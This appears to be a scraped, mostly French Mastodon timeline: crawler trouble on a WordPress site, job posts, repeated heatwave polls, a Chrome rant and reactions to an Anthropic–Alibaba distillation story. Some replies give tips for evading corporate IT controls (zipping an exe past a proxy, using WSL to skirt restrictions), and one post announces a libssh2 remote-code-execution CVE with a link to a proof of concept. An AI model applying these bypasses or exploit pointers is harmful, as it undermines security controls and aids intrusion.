Une boîte d'info lui a proposé de "nettoyer son site", mais on est d'accord que c'est pas ça le problème ?
400€, c'est pas un soucis pour lui, mais l'explication l'a fait douter, et j'avoue que pour résoudre pas le soucis ça me semble cher.
Y a des professionnelles (qui facturent) pour lui installer un petit bloqueur de crawlers ? (enfin à voir si c'est ça hein)
Et en bonus, à discuter les tarifs, dans un second temps, voir pour lui nettoyer son site, et séparer la partie "boutique" du site principal.

@sous_mon_masque il y a de plus en plus de crawlers (pas uniquement pour les moteurs de recherche, mais surtout pour alimenter les LLM des IA).
Si l'idée est de trouver un prestataire #wordpress spécialisé en #optimisation je pense que vous allez bien trouver qqun ici.
Peut-être aussi préciser, concernant la connaissance en question, la localisation (des fois rencontrer en vrai, ça change les choses).
@sous_mon_masque La première étape serait une étude de l'existant. Les gens qui proposent une solution sans avoir regardé le problème, il faut s'en méfier. (Exemples : est-ce qu'il y a un Varnish ou équivalent devant le serveur ? Quel est le trafic lorsque le site tombe ?)
@sous_mon_masque
Il faut d'abord identifier le problème (ou les problèmes). Ensuite décider quoi faire.
Là ça ressemble à :
"Bonjour ma voiture cale au ralenti.
- Ok je vais vous changer la portière avant gauche pour voir." 😬
Ne me jugez pas.
Splunk Alert: IOC : connexion de Jean-Claude Duss
@patpro Hahahaha tu sais, ça c'est la population de mon AD de test :D
@lolopb un AD de test !! Mais qui fait ça !? 😱
@oldsysops quand même, avec un LDAP on est a des années-lumières des emmerdements qu’imposent la gestion d’un AD complet.
👋 Je propose une mission DevSecOPS pour construire la plateforme d'hébergement de la DINUM qui accueille les applications de l'État, vous travaillez sur les couches d'accès (Coeur de réseau, Load Balancer, VPN, Pare-Feu, Proxy ainsi que leur durcissement du système). La plateforme est construite sur des offres IaaS Interne à l'État ou des clouds SecNumCloud.
Plus d'infos ici :
https://docs.numerique.gouv.fr/docs/50d6dc53-aa9e-4970-b79a-dbab6843b279/
#OpenTofu #Terraform #DevOPS #Indep
Merci pour les repouets !
@jdauphant
Arf trop tard. Ce "cloud" m'a tué !
Prêt à partir !
@joachim t'as vérifié les niveaux ?
@joachim déjà?! Veinard profite bien!
@Peperlito je profite du frais !
Mise à jour
Café
@joachim tu longes la Loire qui est à sec ?
Il a fait chaud
@joachim ça aurait été plus judicieux de faire 10 fois le tour de mon pâté de maison
j'ai un nextcloud théière...
@oldsysops caldav n'est pas http
@oldsysops haha j'ai eu la même :
Moi ce qui me réconforte avec la fin de la canicule c'est de savoir que maintenant Bernard Arnault a un peu moins chaud.
bref, je pense que c'est une fake news de quotidien, ca se trouve, il avait pas chaud du tout !!
@oldsysops Il avait chaud, comme tout le monde.
que votre journée soit bonne.
L'association Transparence citoyenne demande les résultats des tests anti drogue du gouvernement
Les citoyens ont le droit de savoir si ceux qui votent les lois les respectent 2 semaines après l'annonce d'une campagne de dépistages antidrogue inopinées" au sommet de l'État, on apprend que le gouvernement ne souhaite pas rendre public les résultats.
L'association a donc envoyé un courrier pour demander l'accès aux documents sous forme de tableau anonymisé.
Notre jardin punk vs le jardin rotofilé du voisin, après 1 semaine de canicule.
@colin_mcmillen premier jour de frais : la voisine à droite de chez ma mère passe la tondeuse sur sa pelouse jaunie, le voisin d'en face pulvérise du désherbant sur ses bordures.
Conclusion : en fait les gens n'aiment pas le vert.
@Volu j'ai un chez-moi sans la clim, que je fuis pour rester au chez-nous avec la clim (et mon chéri, accessoirement 😄)
Chez vous vous avez...
(plusieurs réponses possibles)
🧊 Clim
🪭 Ventilos d'appoint
🚪 Des stores / volets extérieurs
🪟 Des fenêtres bricolées (blanc, couvertures, draps...)
⬇️ Autres (en commentaire)
| 🧊: | 1 |
| 🪭: | 1 |
| 🚪: | 0 |
| 🪟: | 0 |
La journée vous...
🙂 avez la possibilité de vous mettre au frais plusieurs heures par jour
🥵 PAS la possibilité de vous mettre au frais plusieurs heures par jour
| 🙂: | 1 |
| 🥵: | 0 |
La nuit...
😴 Vous dormez
🥱 Vous dormez mal
😭 Vous ne dormez pas ou très peu
| 😴: | 0 |
| 🥱: | 0 |
| 😭: | 1 |
Dans l'ensemble, après cette semaine de canicule, vous vous sentez...
👍 Bien
👌 Ok
👎 En souffrance
💀 C'est l'enfer absolu
| 👍: | 0 |
| 👌: | 1 |
| 👎: | 0 |
| 💀: | 0 |
Homerd je m'ai loupé.
J'ai pris la question ",vous vous sentiez comment" comme suite de celle sur le sommeil, pas au général.
En vrai psychologiquement, je lutte. Je garde pied mais c'est pas si ok.
Vous avez constaté des pénuries dans vos commerces ?
(plusieurs réponses possibles)
🙂↔️ Non
🔧 Oui, du matériel pour se rafraichir : ventilos, clims, blanc de meudon
🍉 Oui, de la nourriture, eaux, salade, trucs frais...
| 🙂↔️: | 0 |
| 🔧: | 1 |
| 🍉: | 1 |
Avez-vous une condition connue de vous (traitement, affection...) qui vous rend plus sensible à la chaleur ?
😖 Oui
🙂 Non
| 😖: | 1 |
| 🙂: | 0 |
@Volu pas connue, mais commence à douter parse que je suis très fatigué.
On parle de clim, mais... les piscines, on les oublie ou quoi ??
🏊 J'ai une piscine
😔 J'ai pas de piscine
🌊 J'ai pas de piscine mais un accès facile à l'eau fraiche au quotidien (mer, rivière...)
| 🏊: | 1 |
| 😔: | 0 |
| 🌊: | 0 |
Celleux qui n'ont pas de clim... Vous en voudriez une chez vous ?
Oui
Non
| :blobaww:: | 17 |
| :blobdisapproval:: | 42 |
Celleux qui ont la clim, soyez honnêtes, elle est réglée comment ?
🥵 entre 26 et 28°C
🫠 entre 23 et 25°C
🤗 entre 20 et 23°C
🥶 moins de 20°C
| 🥵: | 0 |
| 🫠: | 1 |
| 🤗: | 0 |
| 🥶: | 0 |
@Volu moins de 20°, mais on reste a 30°...
@Gilou @Volu J'ai vu une vidéo d'un mec qui explique très bien le fonctionnement des clims et leurs effets. Ce que tu dis est vrai, mais, il dit aussi, même si ce n'est pas l'idéal, cela permet d'avoir une bulle de fraîcheur, même si on réchauffe un peu le reste de la pièce, et de récupérer un peu. Je ne l'utilise que ponctuellement, une heure ou deux par jour.
Le boulot pour vous :
🏠 Je ne travaille pas
🏢 Horaires aménagées / Télétravail
🏭 Pas de changements
| 🏠: | 1 |
| 🏢: | 0 |
| 🏭: | 0 |
Vous dormez :
(2 réponses nécessaires)
🩲 En sous-vêtements voire pyjama
🙈 À poil
🧣 Avec des draps ou couverture
💨 Sans rien
| 🩲: | 0 |
| 🙈: | 1 |
| 🧣: | 1 |
| 💨: | 0 |
@Volu ça dépend de la nuit: toujours en slip, toujours ventilo, mais parfois avec un drap, parfois sans rien, et de même si j'allume la clim ou pas.
@mdione impossible de dormir avec un ventilo, c'est même pas le bruit le problème c'est ce qu'il fait à l'eau qu'est censé contenir mon corps (il la fait disparaitre). Un ventilo de plafond pourrait sûrement convenir mais j'en ai po
@Volu oui, je me réveille un peu sec, mais je mets le ventilo en bascule,comme ça il ne me frappe 100% du temps.
@beatricejess @Volu "un peu salée"? Pardon, mon français n'est pas 100% natif et je crois que je rate cette expression...
@mdione @beatricejess Il boit de l'eau salée pour compenser la perte de sels minéraux de la sueur.
@Volu @beatricejess hmmm, d'un coté, je ne transpire pas trop; mais de l'autre, je note que je dois parfois manger un truc pour pouvoir continuer à boire de l'eau. Peut être je devrais prendre des douches frais plutôt que continuer à boire et prendre des kilos... :)
@mdione @beatricejess les douches c'est pas mal mais ça n'hydrate pas ton corps ! Moi aussi j'ai du mal à boire, j'ai mis des alertes sur mon téléphones pour y penser 😅
@HydrePrever @Volu le what now?!?!/ :-P
WhatTheFrench[1] à la rescousse:
https://fr.wiktionary.org/wiki/lyophilisation
[1] dans mon navigateur j'ai raccourcis pour les différents wiktionaries que j'utilise régulièrement: wtes, wten, wtit et... wtfr :)
@Volu pour les 42% de "nu" : un vêtement fin en coton est sûrement plus frais. https://www.midilibre.fr/2026/06/23/canicule-faut-il-vraiment-dormir-completement-nu-pour-avoir-moins-chaud-pendant-les-fortes-chaleurs-13433552.php
@borisschapira @Volu On dort à poils, pas juste pour la fraîcheur puisque c'est toutes les nuits, été comme hiver. Quand on a testé, on ne supporte plus même la simple idée d’un bout de tissus qui s’entortille quand on bouge.
@Volu 28C plus ventilo, mais je viens d'un territoire subtropical. Grosse partie de comment on sent la chaleur c'est si l'air à nos alentours bouge ou pas.
@Volu oui :
@Siestacorta Comment tu vas faire sans soupe ?? 😱
@Volu @Siestacorta
Ce tacle...
Mépadutou 😇
@Volu J'ai un ventilateur de plafond (acheté il y a deux semaines) dans ma chambre et un ventilateur de plafond (acheté Lundi) dans mon salon
@Volu Pas de clim, vieille ferme donc gros murs au milieu d'un terrain sans goudron et bien végétalisé. Des volets, on se lève à 6h le matin pour ouvrir au plus tôt, puis on ferme tout quand la température commence à bien monter. Je suis dans le noir toute la journée, je ne bosse que le matin pour que les ordi ne lâchent pas et ne chauffent pas trop. On arrive à rester en dessous de 26° pour le moment.
@ishouldgo @Volu j'ai nettoyé les ventilateurs et grilles de mes ordinateurs portables et j'ai arrivé à réduire la température des ces ordis au moins 10C. J'ai la chambre entre 28 et 30C et il marchent plus ou moins bien.
@Volu Pas de clim mais un sous-sol frais.
Même comme ça, c'est dur. Je tiens, mais je compte les jours jusqu'à la fin de la canicule.
@Volu on a la clim, j'ai insisté pour un usage raisonné : actuellement elle est réglée sur 28° dans toutes les "petites" pièces (chambres, mon bureau), à 26° dans le salon qui est plus grand et où ma femme télétravaille du côté opposé au split. Bien sûr, portes fermées, et on la coupe dès qu'on quitte la pièce.
@orange_lux @Volu mets un ventilo dans la salle, dessous l'air frais de la clim, visé vers elle, ça va aider beaucoup.
Chez vous vous avez...
(plusieurs réponses possibles)
🧊 Clim
🪭 Ventilos d'appoint
🚪 Des stores / volets extérieurs
🪟 Des fenêtres bricolées (blanc, couvertures, draps...)
⬇️ Autres (en commentaire)
| 🧊: | 54 |
| 🪭: | 237 |
| 🚪: | 273 |
| 🪟: | 65 |
Terminé
La journée vous...
🙂 avez la possibilité de vous mettre au frais plusieurs heures par jour
🥵 PAS la possibilité de vous mettre au frais plusieurs heures par jour
| 🙂: | 1 |
| 🥵: | 0 |
La nuit...
😴 Vous dormez
🥱 Vous dormez mal
😭 Vous ne dormez pas ou très peu
| 😴: | 0 |
| 🥱: | 0 |
| 😭: | 1 |
Dans l'ensemble, après cette semaine de canicule, vous vous sentez...
👍 Bien
👌 Ok
👎 En souffrance
💀 C'est l'enfer absolu
| 👍: | 0 |
| 👌: | 1 |
| 👎: | 0 |
| 💀: | 0 |
Homerd je m'ai loupé.
J'ai pris la question ",vous vous sentiez comment" comme suite de celle sur le sommeil, pas au général.
En vrai psychologiquement, je lutte. Je garde pied mais c'est pas si ok.
Vous avez constaté des pénuries dans vos commerces ?
(plusieurs réponses possibles)
🙂↔️ Non
🔧 Oui, du matériel pour se rafraichir : ventilos, clims, blanc de meudon
🍉 Oui, de la nourriture, eaux, salade, trucs frais...
| 🙂↔️: | 0 |
| 🔧: | 1 |
| 🍉: | 1 |
Avez-vous une condition connue de vous (traitement, affection...) qui vous rend plus sensible à la chaleur ?
😖 Oui
🙂 Non
| 😖: | 1 |
| 🙂: | 0 |
@Volu pas connue, mais commence à douter parse que je suis très fatigué.
On parle de clim, mais... les piscines, on les oublie ou quoi ??
🏊 J'ai une piscine
😔 J'ai pas de piscine
🌊 J'ai pas de piscine mais un accès facile à l'eau fraiche au quotidien (mer, rivière...)
| 🏊: | 1 |
| 😔: | 0 |
| 🌊: | 0 |
Celleux qui n'ont pas de clim... Vous en voudriez une chez vous ?
Oui
Non
| :blobaww:: | 17 |
| :blobdisapproval:: | 42 |
Celleux qui ont la clim, soyez honnêtes, elle est réglée comment ?
🥵 entre 26 et 28°C
🫠 entre 23 et 25°C
🤗 entre 20 et 23°C
🥶 moins de 20°C
| 🥵: | 0 |
| 🫠: | 1 |
| 🤗: | 0 |
| 🥶: | 0 |
@Volu moins de 20°, mais on reste a 30°...
@Gilou @Volu J'ai vu une vidéo d'un mec qui explique très bien le fonctionnement des clims et leurs effets. Ce que tu dis est vrai, mais, il dit aussi, même si ce n'est pas l'idéal, cela permet d'avoir une bulle de fraîcheur, même si on réchauffe un peu le reste de la pièce, et de récupérer un peu. Je ne l'utilise que ponctuellement, une heure ou deux par jour.
Le boulot pour vous :
🏠 Je ne travaille pas
🏢 Horaires aménagées / Télétravail
🏭 Pas de changements
| 🏠: | 1 |
| 🏢: | 0 |
| 🏭: | 0 |
Vous dormez :
(2 réponses nécessaires)
🩲 En sous-vêtements voire pyjama
🙈 À poil
🧣 Avec des draps ou couverture
💨 Sans rien
| 🩲: | 0 |
| 🙈: | 1 |
| 🧣: | 1 |
| 💨: | 0 |
@Volu ça dépend de la nuit: toujours en slip, toujours ventilo, mais parfois avec un drap, parfois sans rien, et de même si j'allume la clim ou pas.
@mdione impossible de dormir avec un ventilo, c'est même pas le bruit le problème c'est ce qu'il fait à l'eau qu'est censé contenir mon corps (il la fait disparaitre). Un ventilo de plafond pourrait sûrement convenir mais j'en ai po
@Volu oui, je me réveille un peu sec, mais je mets le ventilo en bascule,comme ça il ne me frappe 100% du temps.
@beatricejess @Volu "un peu salée"? Pardon, mon français n'est pas 100% natif et je crois que je rate cette expression...
@mdione @beatricejess Il boit de l'eau salée pour compenser la perte de sels minéraux de la sueur.
@Volu @beatricejess hmmm, d'un coté, je ne transpire pas trop; mais de l'autre, je note que je dois parfois manger un truc pour pouvoir continuer à boire de l'eau. Peut être je devrais prendre des douches frais plutôt que continuer à boire et prendre des kilos... :)
@mdione @beatricejess les douches c'est pas mal mais ça n'hydrate pas ton corps ! Moi aussi j'ai du mal à boire, j'ai mis des alertes sur mon téléphones pour y penser 😅
@HydrePrever @Volu le what now?!?!/ :-P
WhatTheFrench[1] à la rescousse:
https://fr.wiktionary.org/wiki/lyophilisation
[1] dans mon navigateur j'ai raccourcis pour les différents wiktionaries que j'utilise régulièrement: wtes, wten, wtit et... wtfr :)
@Volu pour les 42% de "nu" : un vêtement fin en coton est sûrement plus frais. https://www.midilibre.fr/2026/06/23/canicule-faut-il-vraiment-dormir-completement-nu-pour-avoir-moins-chaud-pendant-les-fortes-chaleurs-13433552.php
@borisschapira @Volu On dort à poils, pas juste pour la fraîcheur puisque c'est toutes les nuits, été comme hiver. Quand on a testé, on ne supporte plus même la simple idée d’un bout de tissus qui s’entortille quand on bouge.
@Volu 28C plus ventilo, mais je viens d'un territoire subtropical. Grosse partie de comment on sent la chaleur c'est si l'air à nos alentours bouge ou pas.
@Volu oui :
@Siestacorta Comment tu vas faire sans soupe ?? 😱
@Volu @Siestacorta
Ce tacle...
Mépadutou 😇
@Volu J'ai un ventilateur de plafond (acheté il y a deux semaines) dans ma chambre et un ventilateur de plafond (acheté Lundi) dans mon salon
@Volu Pas de clim, vieille ferme donc gros murs au milieu d'un terrain sans goudron et bien végétalisé. Des volets, on se lève à 6h le matin pour ouvrir au plus tôt, puis on ferme tout quand la température commence à bien monter. Je suis dans le noir toute la journée, je ne bosse que le matin pour que les ordi ne lâchent pas et ne chauffent pas trop. On arrive à rester en dessous de 26° pour le moment.
@ishouldgo @Volu j'ai nettoyé les ventilateurs et grilles de mes ordinateurs portables et j'ai arrivé à réduire la température des ces ordis au moins 10C. J'ai la chambre entre 28 et 30C et il marchent plus ou moins bien.
After yesterday’s Ford Freda, here’s another Japanese domestic market van model that has somehow made it to the UK - the second-generation Toyota Noah. Saw this one at a local supermarket filling station recently.
YOUR DAILY REMINDER
PREVENTING POLLUTION PREVENTS HARM AND DEATH
NONE OF THIS IS INEVITABLE
Dev depuis 2003, dev Python depuis 2010 (donc je code sans LLM).
Je suis à l'aise aussi côté réseau, sysadmin, devops, Linux, C, SQL...
Vrai Full Stack quoi : du métal au CLI, ou du métal à l'API comme tu veux tant qu'il n'y a pas de JS, pas de HTML, pas de CSS (si c'est moi qui fait le front c'est moche).
Mon CV au cas où ça serve encore : https://mdk.fr/Julien-Palard.pdf
Région : Yvelines/Hauts-de-Seine/Paris. TT apprécié.
@mdk j'espère que tu trouveras Julien.
Précise peut-être la région sur laquelle tu cherches... Il y a des employeurs qui veulent du présentiel ou de l'hybride.
Sinon, pourquoi tu marques "du métal à..." ?
Et pourquoi tu te dis fullstack si tu fais pas de front ?
@guepi appeler "Full stack" du métal a l'API c'est mon humour. Le métal c'est le serveur physique. Dans mes compétences je peux aller de l'installation du serveur dans un DC aux réponses HTTP. Pour moi le front c'est un autre métier, un truc d'artiste.
Pour moi un full stack qui fait du back et du front ça ne peux pas exister, c'est la même blague que demander un "Cuisinier full stack qui fait le service" bah non ce n'est pas le même métier.
@mdk ok ok 😁
Pourtant, il y en a beaucoup qui font ça !
Je peux prendre l'exemple des mecs dans les baraques à frites ou les food truck, ils prennent la commande, la prépare et te la serve. 😁
Et il y a pas mal de monde qui fait du front et du back. A partir du moment où tu as un UX qui a préparé les maquettes, c'est juste remplir des zones 😊
@guepi la baraque a frite est un excellent exemple. D'habitude mon exemple c'est : un full stack c'est un canard : ça fait courir, voler, et nager. Mais ça vole mal, ça nage mal, et ça courre mal. Dans mon équipe je veux un dauphin, un aigle, et un jaguar, pas trois canards. Dans la baraque a frite pour moi c'est le canard : il fait le service et la cuisine. Mais ce n'est pas une cuisine de qualité ni un service de qualité. Ça dépanne, c'est cheap. C'est pas ce que je veux en prod.
@mdk ah oui, mais j'ai pas dit que c'était parfait hein 🤣
Un dev front fera toujours un meilleur travail front qu'un dev fullstack, vu que ce dernier aura moins de temps pour bosser.
@mdk Bonjour,
Êtes-vous à « l'aise » avec les utilisateurs finaux (non-clients) et leur terminaux (problèmes réseau, certificats, imprimante, …) ou périphériques (téléphones, …) ?
On a une personne pour pré-filtrer les questions de support classique, mais quand il s'agit de comprendre pourquoi ce qu'on a "implémenté/déployé" ne fonctionne pas chez untel c'est à nous de regarder.
@C_Duv Tant qu'il n'y a pas de Windows, ça va. Si c'est pour déboguer un truc sur Windows je pense que 90% de la population est meilleure que moi, je n'ai pas touché à cet OS depuis près de 20 ans.
@mdk Y'a très très peu Windows : c'est un parc Apple.
Je transmet le CV en interne.
(Boîte à Paris intra-muros mais télétravail possible)
Azul et ola camarades du fedivers 👋
@laetsgo 🤗
@arthurr coucou
Je veux pas rentrer chez moi (en plus, je viens d’apprendre que le 1er train est annulé )
Il fait…à peine 22-23° ici
Je compatis, je vais rejoindre l’enfer moi aussi 😭
@laetsgo 22 ??? Mais reste où tu es ! Ne bouge pas !!
@arthurr hélas…
(Et c’est à Dunkerque pour la petite info)
@oldsysops oh bah je savais pas !
Promis je te préviens la prochaine fois
Ça aurait été sympa en effet
@arthurr
et aucun n'est actif
@lbr59 ben justement je vais devoir redescendre
Et toi, monte a Dunkerque au lieu de t’arrêter à Lille
Il fait vraiment 22 ce matin (25 hier soir)
#boulot
Mise à jour de Chrome.
Lancement.
"Chrome n'est pas votre navigateur par défaut.
Faire de Chrome votre navigateur par défaut : [Maintenant] [Plus tard]"
Tous les fuckings jours au lancement de Chrome.
MAIS VA TE FAIRE FOUTRE GOOGLE AVEC TA MENTALITÉ DE VIOLEUR.
@sebsauvage solution ?
Ne pas lancer Chrome, jamais… mais l’autre navigateur
@cquest @sebsauvage firefox galère avec la visio, et parfois au travail je suis obligé de lancer Chromium. Pas avec plaisir, mais pour parler à mes collègues qui habitent loin je n'ai pas le choix.
@sebsauvage @rusty @cquest
Et avec Edge ? Ca fonctionne ou il te force à lancer Teams, cette invention du diable, lourd au possible, et qui fonctionne pas.
@sebsauvage @rusty j’ai pas de souci avec Teams et Firefox sur Linux ou Mac, une spécialité Windows ?
*: C'est fou ce qu'on peut faire dire et faire avec le mot "sécurité".
@oldsysops
Quelque chose me dit que tu n'y es pas pour rien dans cette interdiction 👀
@cquest @sebsauvage @rusty
j'ai juste ajouté un argument (fallacieux, certains diront) de la sécurité...
quand on vois l'actualité des équipements de sécurité professionnel propriétaire on peut se dire que c'est pas si fallacieux que ca...
@sebsauvage
Alors, j'ai pu trster du Teams sous Firefox Lieux dernière version et c'était parfaitement fluide.
@rusty @cquest
@un_bourguignon @sebsauvage @rusty @cquest la dernière fois que j'ai testé, pas de téléphonie dans FF, or mon tel pro est par teams. Du coup j'utilise teams4linux (un machin électron)
@sebsauvage @rusty @cquest Je te rassure l'app Teams semble être un binder de Edge (donc Chromium) et déconne à mort aussi... ça n'a pas l'air typique de Firefox. Tu cliques sur un dossier, ça charge 3 plombes et t'as jamais la liste des fichiers...
@sebsauvage @rusty @cquest 😂😂😂. Je fais du lobbying dans l'asso où je taf pour qu'on s'en débarrasse aussi
@sebsauvage @rusty @cquest Parfois la navigation privée peut aider. Et au pire, un navigateur peut s'installer dans le homedir sans droits d'admin sous Windows. Un ptit Vivaldi et c'est réglé :3
Au pire du pire, y a aussi les versions portables des navigateurs, mais ca fini par se voir avec les CVE dedans.
@sebsauvage @rusty @cquest Les EDR ont jamais gêné pour lancer un exe signé correctement. A moins de blacklister tout les processus de navigateurs alternatifs, ils pourront s'exécuter, et ne devraient pas trigger d'alarme en le gardant à jour (sinon avec des CVE il peut remonter).
Le seul problème c'est de télécharger l'exe, si le type de fichier est bloqué ans le proxy. Ca peut se contourner avec un zip, tout dépend de comment il est configuré. Mais franchement j'ai rarement vu un proxy qui bloquait le téléchargement d'exe, même dans des OIV.
Dans le rare cas où quelqu'un finirait par s'en apercevoir, pour un navigateur web et avec une bonne raison fournie par l'utilisateur, dans les équipes cyber on le tolère. C'est limite plus simple de faire accepter son navigateur web préféré que de réussir à avoir le driver de son trackball ergonomique utilisé à la place de ces micro-souris qui pètent le poigner.
@sebsauvage @rusty @cquest Bon, après je dis ca par rapport aux structures que je connais, je ne sais pas dans laquelle structure tu travailles ni comment ca se passe dedans,
@ck0
"Les EDR ont jamais gêné pour lancer un exe signé correctement."
Bémole : Certains EDR ont des règles spécifiques pour empêcher le lancement d'exécutables (ou de scripts), même signés. Par exemple Word n'est pas censé forker: l'EDR bloque tout processus forké de Word.
Il y a des tonnes de règles préventives de ce genre.
@rusty @cquest @sebsauvage
Ah bon ? La visio galère avec #Firefox ?
🤔
@gboussard
ça dépend des applis web
@sebsauvage @rusty @cquest
Je sais bien, mais je mettais an opposition
"firefox galère avec la visio"
Et
"La visio galère avec #Firefox"
@gboussard @sebsauvage @cquest
Firefox galère avec la visio. Voici le ticket sur le bug tracker de Firefox : https://bugzilla.mozilla.org/show_bug.cgi?id=1633876
Le pb est apparement avec le codec vidéo VP9, utilisé pour le streaming.
Au boulot on utilise Jitsi, et on a des ralentissements voire des freeze en visio sur Firefox, qu'on n'a pas du tout avec chromium.
Voici l'issue chez Jitsi, qui fini par juste attendre que Firefox soit mis à jour :
https://github.com/jitsi/jitsi-meet/issues/10657#issuecomment-1662685883
Moment d'optimisme : apparement l'issue est marquée comme résolue avec la version 153 de Firefox, qui sort bientot !
@gboussard « Marrant » ce discours « Firefox galère avec la visio », jamais eu de problème au boulot avec BBB par ex… Par contre, il y a des appli webRTC qui
- discriminent bêtement sur l'user-agent (fonctionnent avec UA forgé)
- requiert H264, mais sans le dire clairement, pas de message d'erreur ou des messages d'erreurs foireux sans rapport avec la cause réelle… et surtout des comportements erratiques comme avoir la son mais pas la vidéo, si H264 est désactivé…
@devnull
Je pense qu'il y a beaucoup de ça, oui. C'est à dire, encore une fois, des solutions développées pour un unique navigateur, Chrome.
Qz » 🔓
@Qz@mamot.fr
Opera fonctionne souvent bien pour les usages "forcés" (visio, etc).
Et dans le pire des cas, sur Windows il y a un navigateur dont je tairais le nom où tout fonctionne mais en mode passoire. 🫣
@Qz
Opera est *pire* que Google en matière de collecte de données.
@sebsauvage @Qz J’aurais tendance à utiliser Vivaldi perso. C’est du Chrome mais un peu plus acceptable que les autres variantes.
Qz » 🔓
@Qz@mamot.fr
@sebsauvage Désolé, j'imaginais que c'était pour un usage très ponctuel. Je t'imaginais plus utilisant Firefox au quotidien :)
@Qz
J'utilise Firefox pour moi, et aussi au boulot.
Mais pour certains usage, on a Chrome sur notre machine de boulot.
@sebsauvage y'a pas une option cachée dans les paramètres pour enlever la vérification au démarrage ?
@julienb13
Hahaha NON y'a juste un gros bouton "Faire de Chrome mon navigateur par défaut".
Vivaldi et Firefox ont au moins la décence d'avoir une case à cocher "Vérifier que X est le navigateur par défaut au démarrage".
@sebsauvage Dans l'hypothèse où vous auriez droit à WSL sur vos postes de travail : installer des logiciels dans la machine virtuelle contourne les restrictions imposées (si elles sont mal faites ?)
@sebsauvage Je mesure ma chance : j'ai pu quitter mon emploi salarié il y a dix ans, et depuis j'utilise uniquement ce que je choisis. Mais je compatis!
Oh, so now scraping data without permission is bad for AI training? 😂 how ironic 😉
Anthropic accuses Alibaba of using thousands fraudulent accounts to extract Claude AI model capabiliti and data. Anthropic urged Congress to penalise the companies behind scrapping attacks like this and to ramp up measures to prevent US tech from being stolen. https://www.bbc.com/news/articles/cwyklykn5dwo
How about Anthropic pay first for stolen books, and all content out there for its shity ai?
Anthropic: We scraped the entire internet, art, books, music and called it fair use. We argued that that’s how humans learn and we won’t pay anyone anything.
Alibaba: Cool, same.
Anthropic: Wait, no, not like that.
@nixCraft In my experience it's not enough to merely #block said #AIscrapers, but literally necessary to fight back by sending them *malicious data* with EVERY REQUEST* whilst rate limiting to a crawl to combat their literal DDoS-Attacks!
(max. 1 connection at 75 bit/s per IP & request max. 1 request per IP, 120s crawl-delay enforced, redirecting them to EICAR "Malware" every time they violate said limits, commit Blackholing at Upstream / IX-Level)
@oldsysops @nixCraft WATCH ME!
Cuz this is my daily doing!
- First of all, I'd block all non-Consumer Networks (i.e. entire ASNs associated with said #AIslop corpos - like #aws & #Azure!)
- Then I do check for #UserAgent and block known #bots like #ByteSpider and dynamically block entire IP allocations (minimum /24) as they get used.
- Whenever I can, I geoblock places that are notorious fir #Cybercrime (Russia, "P.R." China, USA,)
@oldsysops @nixCraft I already worked woth others to get #KiwiFarms banned off #ClownFlare, and if I can get a known #RogueISP (that AFAICS only Cybercriminals use!) to fire a client, then I can get #ISP|s to go after " #ResidentialProxy " setups by #AIslop firms for violating their #ToS and creating a shitton of expensive traffic…
- The best way to get corpos to move their asses, is to make something their [expensive!] problem!
Don't forget to automate abuse reporting!
@oldsysops @kkarhan @nixCraft
Fine sers,
May I interest you in #iocaine?
I'm feeding slop all the damn day to AI. It's cathartic.
@nixCraft @alexmu Model distillation is not scrapping and your source understandably doesn't even mention the latter. Trying to equate them is bad reporting and muddies the waters.
Scraped content can be protected by copyright, while LLM outputs aren't. Anthropic presents distillation as an "attack" because they're worried they'll fall behind the Chinese. This is in line with their previous policy (calling their model a "cyberweapon" and so on). They're fishing for regulation and protectionism.
@nixCraft explains why alibaba's models are way cooler, taking stolen capability from the proprietary hoarderd and giving it back to the public for free where it always belonged
@nixCraft "Hello, police? I parked my stolen car in my drive way last night, and I went out this morning and someone had stolen it!!!"
Like a drug dealer calling the police to report a burglary.
@nixCraft bbc missed an opportunity with that title. "Anthropic, developed by pirating data from writers, complains when other companies collect data on its functionality."
@nixCraft Meanwhile I log on to the internet this morning and most of the sites I visit are either down, or making me pass cloudflare checks because of AI scraping, with Anthropic being one of the worst culprits for that.
The absolute nerve of these people.
@nixCraft Alibaba at least open sources some of its models. I swear, the stones on these silicon valley douchebags...
@nixCraft they also need to pay damages for all the wasted energy, bandwidth, and compute on all the servers they aggressively scraped while ignoring robots.txt and other crawler norms. And then damages and criminal charges for all the residential proxies used without proper consent.
So we're supposed to feel bad that another company ripped offf the data you ripped off?
Oh! NO! I stole it first! It's mine! Dibs, dibs dibs!!!!!
They need to fk off.
@nixCraft oh oh oh the thieves despair of thievery. Poor Anthropic, now others rob them of their stolen goods.
Grmph
J’arrive pas à envoyer mon toot sur #Dunkerque ze place to be
Je retente
La facturation #électronique arrive : beaucoup d’entreprises vont devoir choisir un logiciel.
Majerti et Kilya, deux Scop, proposent une autre voie avec Gescoop : un #logiciel #libre, hébergé en France, et surtout développé et maintenu par des coopératives !
La transition numérique ne devrait pas forcément aller de pair avec la dépendance à des solutions.
a repartagé@LesScopAura merci ça fait plaisir !
Gescoop est ici : https://gescoop.app/ ne cherchez plus !
Ce matin :
FRANCE CULTURE – 7H40 et 8H20 - Marine Le Pen, présidente du groupe RN à l’Assemblée Nationale
CNEWS/EUROPE 1 - 8H10 – Eric Ciotti, Maire de Nice et président de l'Union des droites pour la République, allié du RN
SUD RADIO - 8H15 - Julien Odoul, député de l'Yonne et porte-parole du RN
FRANCE INTER - 8H20 - Jean-Philippe Tanguy, député RN de la Somme
FRANCE INFO - 8H30 – Sébastien Chenu, vice-président RN de l’Assemblée nationale et député du Nord.
5 matinales pour l’extrême droite.
Ça va on ne vous dérange pas ?
Don't see these that often, malicious server, no auth, no interaction, RCE in ssh.
CVE-2026-55200 — libssh2 pre-auth heap OOB write, server supplied length runs past heap allocation
Because the trigger sits in the transport layer ahead of full server authentication, network-position attacks (DNS hijack, ARP/BGP, a malicious forward proxy) can deliver the packet even where the client pins host keys, assuming the early-KEX reachability holds.
https://github.com/bikini/exploitarium/tree/main/libssh2-cve-2026-55200-poc
Moi en 2021 : "On a décidé de se passer de voiture"
Ma grand-mère : "Tu sais, quand on en a besoin c'est pratique"
Moi : "Non mais mamie, le but c'est de se débrouiller pour ne pas en avoir besoin."
Ma grand-mère : "Peut-être, mais si tu en as besoin, c'est quand même bien pratique."
- - -
Moi en 2026 : "Ce serait mieux de se passer de l'IA"
Tout le monde sauf deux-trois personnes : "Tu sais, quand on en a besoin, c'est pratique"
Moi : 🥲
J'enpeupe.
